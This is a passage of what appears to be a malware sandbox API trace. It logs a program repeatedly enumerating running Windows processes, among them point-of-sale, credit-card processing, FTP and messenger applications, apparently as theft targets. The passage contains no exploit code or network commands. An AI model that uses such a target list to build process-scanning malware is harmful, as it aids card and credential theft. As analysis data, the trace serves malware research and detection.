cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0262.210] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0262.212] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0262.213] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0262.216] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0262.218] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0262.219] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0262.221] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0262.222] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0262.224] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0262.226] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0262.227] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0262.229] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0262.264] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0262.266] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0262.267] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0262.269] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0262.272] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0262.274] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0262.276] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0262.280] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0262.282] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0262.284] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0262.286] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0262.288] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0262.290] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0262.292] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0262.295] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0262.297] CloseHandle (hObject=0x758) returned 1 [0262.297] Sleep (dwMilliseconds=0x64) [0262.406] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0262.417] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.420] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0262.421] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0262.423] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.425] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0262.427] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.428] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0262.430] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0262.432] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0262.434] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.436] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.437] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0262.439] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.441] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.443] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.444] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.446] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.448] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.498] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.500] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0262.501] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0262.503] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0262.504] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.505] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.507] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0262.508] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0262.510] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0262.511] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.513] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0262.514] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0262.516] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0262.517] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0262.519] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0262.521] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0262.522] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0262.524] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0262.525] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0262.527] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0262.528] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0262.530] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0262.532] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0262.533] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0262.535] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0262.536] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0262.538] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0262.539] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0262.541] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0262.542] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0262.552] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0262.554] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0262.555] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0262.557] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0262.558] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0262.560] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0262.562] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0262.563] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: 